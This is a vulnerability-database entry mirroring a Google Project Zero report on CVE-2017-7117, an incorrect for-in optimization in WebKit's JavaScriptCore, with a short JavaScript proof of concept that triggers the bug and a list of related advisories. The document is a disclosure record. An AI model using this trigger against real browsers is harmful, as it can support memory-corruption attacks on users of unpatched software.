WebKit JSC Incorrect Optimization Vulnerability

🗓️ 04 Oct 2017 00:00:00Reported by Google Security ResearchType

zdt🔗 0day.today👁 33 Views

WebKit JSC Incorrect Optimization Vulnerability CVE-2017-7117 PoC bypasses fix for Chromium project-zero issue 126

Reporter	Title	Published	Views	Family All 61
0day.today	WebKitGTK+ Code Execution / Cookie Handling / Memory Corruption Vulnerabilities	19 Oct 201700:00	–	zdt
FreeBSD	webkit2-gtk3 -- multiple vulnerabilities	18 Oct 201700:00	–	freebsd
GithubExploit	Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Apple Safari	11 Mar 202601:02	–	githubexploit
Tenable Nessus	Apple Safari < 11.0 Multiple Vulnerabilities	8 Apr 201900:00	–	nessus
Tenable Nessus	Apple iOS < 11.0 Multiple Vulnerabilities (APPLE-SA:APPLE-SA-2017-09-19-1)	17 Apr 201900:00	–	nessus
Tenable Nessus	Apple iOS < 11.0.1 Multiple Vulnerabilities	17 Apr 201900:00	–	nessus
Tenable Nessus	Apple TV < 11 Multiple Vulnerabilities	22 Sep 201700:00	–	nessus
Tenable Nessus	Apple iOS < 11 Multiple Vulnerabilities	21 Sep 201700:00	–	nessus
Tenable Nessus	FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (1ce95bc7-3278-11e8-b527-00012e582166) (Spectre)	29 Mar 201800:00	–	nessus
Tenable Nessus	Apple iTunes < 12.7 WebKit Multiple Vulnerabilities (credentialed check)	27 Sep 201700:00	–	nessus

WebKit: JSC: Incorrect for-in optimization #2

CVE-2017-7117


The following PoC bypasses the fix for the https://bugs.chromium.org/p/project-zero/issues/detail?id=1263 WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal

PoC:
function f() {
    let o = {};
    for (let i in {xx: 0}) {
        for (i of [0]) {

        }

        print(o[i]);
    }
}

f();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

#  0day.today [2018-04-04]  #

04 Oct 2017 00:00Current

7High risk

Vulners AI Score7

EPSS0.0914